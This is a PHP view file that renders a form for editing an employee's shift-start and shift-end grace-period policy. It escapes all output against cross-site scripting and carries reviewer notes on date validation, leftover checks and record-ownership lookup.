v_usr_grace_edit.php
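<?php
// Form to create or edit a user's grace-period policy (shift-start / shift-end minutes,
// "correct punch" and "create alert" flags). This is a view fragment: it reads
// $_SESSION and $_POST directly and echoes the form markup.
//
// Security: every request- or database-derived value written into the markup is passed
// through $esc(). Without that, a crafted POST body (or a stored name) is reflected
// verbatim into element and attribute context, i.e. cross-site scripting.

// HTML-escape a value for element or quoted-attribute context.
// Non-scalar input (e.g. a field posted as an array) renders as an empty string.
$esc = function ($value) {
    return is_scalar($value)
        ? htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
        : '';
};

// Read a POST field, defaulting to '' when the field was not submitted.
$postVal = function ($key) {
    return isset($_POST[$key]) ? $_POST[$key] : '';
};

// Emit the "checked" attribute for a checkbox whose stored value is 'yes'.
$checkedAttr = function ($flag) {
    return $flag == 'yes' ? ' checked' : '';
};

$Users = new Users();
$User_Grace_Period = new User_Grace_Period();
date_default_timezone_set($_SESSION['timeZone']);

// The user being edited, and that user's existing policies, newest first.
$uRow = $Users->search($_SESSION['PID'], $_SESSION['edit_id'], '', '', '', '', '', '', '', '', '', 'lName');
$rows = $User_Grace_Period->search($_SESSION['PID'], $_SESSION['edit_id'], '', '', '', 'effectiveTS DESC');

// Not referenced again in this fragment; kept because the constructor's side effects are not visible here.
$yesNoOptions = new Parse_Options_Array('yesNo');
$yesNoArr = $yesNoOptions->get();

$error_start = '';
$error_cxStart = '';
$error_alertStart = '';
$error_end = '';
$error_cxEnd = '';
$error_alertEnd = '';
$error_date = '';

// Form state: defined up-front so every branch below renders without undefined variables.
$action = '';
$effective = '';
$xEffectiveTS = '';
$minEffectiveTS = 0;
$shiftStart = '';
$cxShiftStart = '';
$alertShiftStart = '';
$shiftEnd = '';
$cxShiftEnd = '';
$alertShiftEnd = '';

$submitBut = $postVal('submitBut');
$usrGraceID = $postVal('usr_graceID');

if ($submitBut == 'New') {
    $action = 'New';
    // A new policy may start no earlier than one day after the newest existing one,
    // or on the user's first day when there is none.
    if (isset($rows[0])) {
        $minEffectiveTS = $rows[0]['effectiveTS'] + 60 * 60 * 24;
    } else {
        $minEffectiveTS = $uRow['firstDayTS'];
    }
} else if ($submitBut == 'Save') {
    // Re-display what was submitted, so a failed save does not blank the form.
    $effective = $postVal('effective');
    $xEffectiveTS = $postVal('xEffectiveTS');
    $action = $postVal('action');
    $shiftStart = $postVal('shiftStart');
    $cxShiftStart = $postVal('cxShiftStart');
    $alertShiftStart = $postVal('alertShiftStart');
    $shiftEnd = $postVal('shiftEnd');
    $cxShiftEnd = $postVal('cxShiftEnd');
    $alertShiftEnd = $postVal('alertShiftEnd');

    // NOTE(review): this form has no minEffectiveTS field, and a client-supplied minimum
    // is only a date-picker hint. Enforce the real minimum where the record is saved.
    $minEffectiveTS = $postVal('minEffectiveTS');

    if ($postVal('effectiveTS') == '') {
        $error_date = ' err';
    }
    // NOTE(review): the checks below read fields this form does not contain and set
    // variables this fragment never prints; they look carried over from another form.
    if ($postVal('punch_shift') == '') {
        $error_shift = " err";
    }
    if ($postVal('punch_meal') == '') {
        $error_meal = " err";
    }
    if ($postVal('paid_brk') == '') {
        $error_paid_brk = " err";
    }
    // $punch_meal and $num_brks are not assigned in this fragment; guard the reads.
    if (isset($punch_meal) && $punch_meal == 'yes' && (!isset($num_brks) || $num_brks == '')) {
        $error_numBrks = ' err';
    }
} else {
    // Load the existing record for editing.
    // NOTE(review): this lookup is keyed by the posted usr_graceID and $_SESSION['PID']
    // only; $_SESSION['edit_id'] is not passed. Confirm that search() or the calling
    // controller checks the record belongs to the user being edited.
    $row = $User_Grace_Period->search($_SESSION['PID'], '', '', '', $usrGraceID, '`effectiveTS` DESC');
    if (!empty($row)) {
        $effective = date('Y-m-d', (int) $row['effectiveTS']);
        $xEffectiveTS = $row['effectiveTS'];
        $shiftStart = $row['shiftStart'];
        $cxShiftStart = $row['cxShiftStart'];
        $alertShiftStart = $row['alertShiftStart'];
        $shiftEnd = $row['shiftEnd'];
        $cxShiftEnd = $row['cxShiftEnd'];
        $alertShiftEnd = $row['alertShiftEnd'];
    }
    // Minimum date is one day after the policy preceding the newest one, if there is one.
    if (isset($rows[1])) {
        $minEffectiveTS = $rows[1]['effectiveTS'] + 60 * 60 * 24;
    } else {
        $minEffectiveTS = $uRow['firstDayTS'];
    }
    $action = 'Edit';
}

$Pr_Jobs = new Pr_Jobs();
$jRows = $Pr_Jobs->get_4_menu($_SESSION['PID'], '', '');
$jobLabel = isset($jRows[$uRow['jobID']]) ? $jRows[$uRow['jobID']] : '';

echo "
<div class='tab_box_liner'>
    <h2>" . $esc($action) . " Grace Period Policy for " . $esc($uRow['fName']) . " " . $esc($jobLabel) . " </h2>
    <div class='input_form'>
        <form action='' method='post' name='edit'>
            <input type='hidden' name='usr_graceID' value='" . $esc($usrGraceID) . "'>
            <input type='hidden' name='f_empl_status' value='" . $esc($postVal('f_empl_status')) . "'>
            <input type='hidden' name='f_userID' value='" . $esc($postVal('f_userID')) . "'>
            <input type='hidden' name='f_fName' value='" . $esc($postVal('f_fName')) . "'>
            <input type='hidden' name='f_jobAreaID' value='" . $esc($postVal('f_jobAreaID')) . "'>
            <input type='hidden' name='f_sort' value='" . $esc($postVal('f_sort')) . "'>
            <input type='hidden' name='xEffectiveTS' value='" . $esc($xEffectiveTS) . "'>
            <input type='hidden' name='action' value='" . $esc($action) . "'>
            <table class='col-12'>
                <tr class='form_separator'>
                    <td class='form_input right' colspan=2>
                        <input type='submit' name='submitBut' value='Save' class='btn btn-save'>
                        <input type='submit' name='submitBut' value='Cancel' class='btn btn-cancel'>
                    </td>
                </tr>
                <tr class='form_separator'>
                    <td class='form_label'>ID #</td>
                    <td class='form_input'>" . $esc($usrGraceID) . "</td>
                </tr>
                <tr class='form_separator'>
                    <td class='form_label" . $error_date . "'>Effective date</td>
                    <td class='form_input'>
                        <input type='text' name='effective' id='effective' value='" . $esc($effective) . "'>
                    </td>
                </tr>
                <tr class='form_separator'>
                    <td class='form_input' colspan=2>
                        <h3>Shift-start grace period</h3>
                    </td>
                </tr>
                <tr class='form_separator'>
                    <td class='form_label'>Minutes before scheduled start</td>
                    <td class='form_input'>
                        <input type='text' name='shiftStart' value='" . $esc($shiftStart) . "' class='w100px'>
                    </td>
                </tr>
                <tr class='form_separator'>
                    <td class='form_label w250px'>Correct Punch¹</td>
                    <td class='form_input'>
                        <div class='colAuto'>
                            <label class='ckbx pad_ckbx'>
                                <input type='checkbox' name='cxShiftStart' value='yes'" . $checkedAttr($cxShiftStart) . ">
                                <span class='checkbox'></span>
                            </label>
                        </div>
                    </td>
                </tr>
                <tr class='form_separator'>
                    <td class='form_label'>Create Alert²</td>
                    <td class='form_input'>
                        <div class='colAuto'>
                            <label class='ckbx pad_ckbx'>
                                <input type='checkbox' name='alertShiftStart' value='yes'" . $checkedAttr($alertShiftStart) . ">
                                <span class='checkbox'></span>
                            </label>
                        </div>
                    </td>
                </tr>
                <tr class='form_separator'>
                    <td class='form_input' colspan=2>
                        <h3>Shift-end grace period</h3>
                    </td>
                </tr>
                <tr class='form_separator'>
                    <td class='form_label'>Minutes after scheduled finish</td>
                    <td class='form_input'>
                        <input type='text' name='shiftEnd' value='" . $esc($shiftEnd) . "' class='w100px'>
                    </td>
                </tr>
                <tr class='form_separator'>
                    <td class='form_label'>Correct Punch¹</td>
                    <td class='form_input'>
                        <div class='colAuto'>
                            <label class='ckbx pad_ckbx'>
                                <input type='checkbox' name='cxShiftEnd' value='yes'" . $checkedAttr($cxShiftEnd) . ">
                                <span class='checkbox'></span>
                            </label>
                        </div>
                    </td>
                </tr>
                <tr>
                    <td class='form_label'>Create Alert²</td>
                    <td class='form_input'>
                        <div class='colAuto'>
                            <label class='ckbx pad_ckbx'>
                                <input type='checkbox' name='alertShiftEnd' value='yes'" . $checkedAttr($alertShiftEnd) . ">
                                <span class='checkbox'></span>
                            </label>
                        </div>
                    </td>
                </tr>
            </table>
        </form>
    </div>
</div>";
?>
<script language="javascript">
    flatpickr("#effective", {
        altInput: true,
        altFormat: "F j, Y",
        dateFormat: "Y-m-d",
        // The (int) cast keeps a non-numeric posted value from raising a TypeError in date();
        // date('Y-m-d') emits only digits and dashes, so the result is safe inside this JS string.
        minDate: '<?php echo date('Y-m-d', (int) $minEffectiveTS); ?>'
    });
</script>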